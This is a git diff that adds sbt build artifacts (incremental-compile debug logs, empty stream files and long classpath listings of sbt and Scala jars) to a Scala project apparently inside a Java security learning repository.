\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/_global/_global/discoveredMainClasses/data b/JavaSecurity/JDK/Scala1/project/target/streams/compile/_global/_global/discoveredMainClasses/data
new file mode 100644
index 00000000..0637a088
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/_global/_global/discoveredMainClasses/data
@@ -0,0 +1 @@
+[]
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/bspReporter/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/bspReporter/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/compile/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/compile/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/compileIncremental/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/compileIncremental/_global/streams/export
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/compileIncremental/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/compileIncremental/_global/streams/out
new file mode 100644
index 00000000..5db86870
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/compileIncremental/_global/streams/out
@@ -0,0 +1,6 @@
+[debug] [zinc] IncrementalCompile -----------
+[debug] IncrementalCompile.incrementalCompile
+[debug] previous = Stamps for: 0 products, 0 sources, 0 libraries
+[debug] current source = Set()
+[debug]> initialChanges = InitialChanges(Changes(added = Set(), removed = Set(), changed = Set(), unmodified = ...),Set(),Set(),API Changes: Set())
+[debug] Full compilation, no sources in previous analysis.
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/copyResources/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/copyResources/_global/streams/out
new file mode 100644
index 00000000..49995276
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/copyResources/_global/streams/out
@@ -0,0 +1,2 @@
+[debug] Copy resource mappings: 
+[debug] 	
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/dependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/dependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..840acb78
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/dependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-xml_2.12-2.2.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/io_2.12-1.10.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist-core-assembly-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/slf4j-api-1.7.36.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-2.14.7-sbt-9c3b6aca11c57e339441442bbf58e550cdfecb79.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/command_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-reader-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-collection-compat_2.12-2.11.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-control_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-api-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-bridge_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main-settings_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-core_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbinary_2.12-0.5.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/error_prone_annotations-2.4.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-core_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/config-1.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-interface-1.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ivy-2.3.0-sbt-396a783bba347016e7fe30dacc60d355be607fe2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/actions_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbt-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-library-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-apache-http_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/checker-qual-3.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/caffeine-2.8.5.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-tracking_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/testing_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-core-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-agent-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/launcher-interface-1.4.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-apiinfo_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-slf4j-impl-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/tasks_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/file-tree-views-2.1.12.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/collections_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-scalajson_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/task-system_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-lm-integration_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-murmurhash_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ssl-config-core_2.12-0.6.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-ivy_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jna-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-cache_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-parser-combinators_2.12-1.1.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zero-allocation-hashing-0.16.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jansi-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/run_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/reactive-streams-1.0.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-reflect-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-platform-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/disruptor-3.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/template-resolver-0.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-builtins-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-relation_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-compiler-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scripted-plugin_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/protocol_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-style-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/completion_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-xml_2.12-2.3.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ipcsocket-1.6.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-jawn-parser_2.12-1.3.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classpath_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jsch-0.2.17.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-position_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/lm-coursier-shaded_2.12-2.1.4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classfile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-native-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-logging_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jansi-2.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-apache-httpasyncclient-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/core-macros_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/logic_2.12-1.10.1.jar
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/exportedProducts/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/exportedProducts/_global/streams/export
new file mode 100644
index 00000000..c9499290
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/exportedProducts/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/externalDependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/externalDependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..840acb78
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/externalDependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-xml_2.12-2.2.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/io_2.12-1.10.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist-core-assembly-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/slf4j-api-1.7.36.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-2.14.7-sbt-9c3b6aca11c57e339441442bbf58e550cdfecb79.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/command_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-reader-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-collection-compat_2.12-2.11.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-control_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-api-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-bridge_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main-settings_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-core_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbinary_2.12-0.5.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/error_prone_annotations-2.4.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-core_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/config-1.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-interface-1.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ivy-2.3.0-sbt-396a783bba347016e7fe30dacc60d355be607fe2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/actions_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sbt-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-library-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/gigahorse-apache-http_2.12-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/checker-qual-3.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/caffeine-2.8.5.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-tracking_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/testing_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-core-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/test-agent-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/launcher-interface-1.4.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-apiinfo_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-slf4j-impl-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/tasks_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/file-tree-views-2.1.12.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/collections_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-scalajson_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/task-system_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-lm-integration_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/sjson-new-murmurhash_2.12-0.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ssl-config-core_2.12-0.6.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/librarymanagement-ivy_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jna-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-cache_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-parser-combinators_2.12-1.1.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zero-allocation-hashing-0.16.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-terminal-jansi-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/run_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-core_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/reactive-streams-1.0.3.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-reflect-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-platform-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/disruptor-3.4.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/template-resolver-0.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-builtins-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-relation_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-compiler-2.12.19.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scripted-plugin_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/protocol_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-style-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/completion_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-compile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-xml_2.12-2.3.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/ipcsocket-1.6.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-jawn-parser_2.12-1.3.2.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classpath_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jsch-0.2.17.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-position_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/lm-coursier-shaded_2.12-2.1.4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-interface-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-classfile_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-native-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-logging_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jansi-2.4.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/shaded-apache-httpasyncclient-0.7.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/core-macros_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/logic_2.12-1.10.1.jar
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/incOptions/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/incOptions/_global/streams/out
new file mode 100644
index 00000000..49612aa9
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/incOptions/_global/streams/out
@@ -0,0 +1,5 @@
+[debug] Created transactional ClassFileManager with tempDir = /Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes.bak
+[debug] About to delete class files:
+[debug] We backup class files:
+[debug] Created transactional ClassFileManager with tempDir = /Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes.bak
+[debug] Removing the temporary directory used for backing up class files: /Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/project/target/scala-2.12/sbt-1.0/classes.bak
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/internalDependencyClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/internalDependencyClasspath/_global/streams/export
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/internalDependencyClasspath/_global/streams/export
@@ -0,0 +1 @@
+
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/internalDependencyClasspath/_global/streams/out b/JavaSecurity/JDK/Scala1/project/target/streams/compile/internalDependencyClasspath/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/project/target/streams/compile/managedClasspath/_global/streams/export b/JavaSecurity/JDK/Scala1/project/target/streams/compile/managedClasspath/_global/streams/export
new file mode 100644
index 00000000..840acb78
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/project/target/streams/compile/managedClasspath/_global/streams/export
@@ -0,0 +1 @@
+/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-library.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-compiler.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-xml_2.12-2.2.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/lib/scala-reflect.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/main_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/io_2.12-1.10.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jna-5.13.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/zinc-persist-core-assembly-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/slf4j-api-1.7.36.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-2.14.7-sbt-9c3b6aca11c57e339441442bbf58e550cdfecb79.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/command_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/jline-reader-3.24.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/scala-collection-compat_2.12-2.11.0.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/util-control_2.12-1.10.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/log4j-api-2.17.1.jar:/Users/drunkbaby/.sbt/boot/scala-2.12.19/org.scala-sbt/sbt/1.10.1/compiler-bridge_2.12-1.10.1.jar:/Users/drunkbab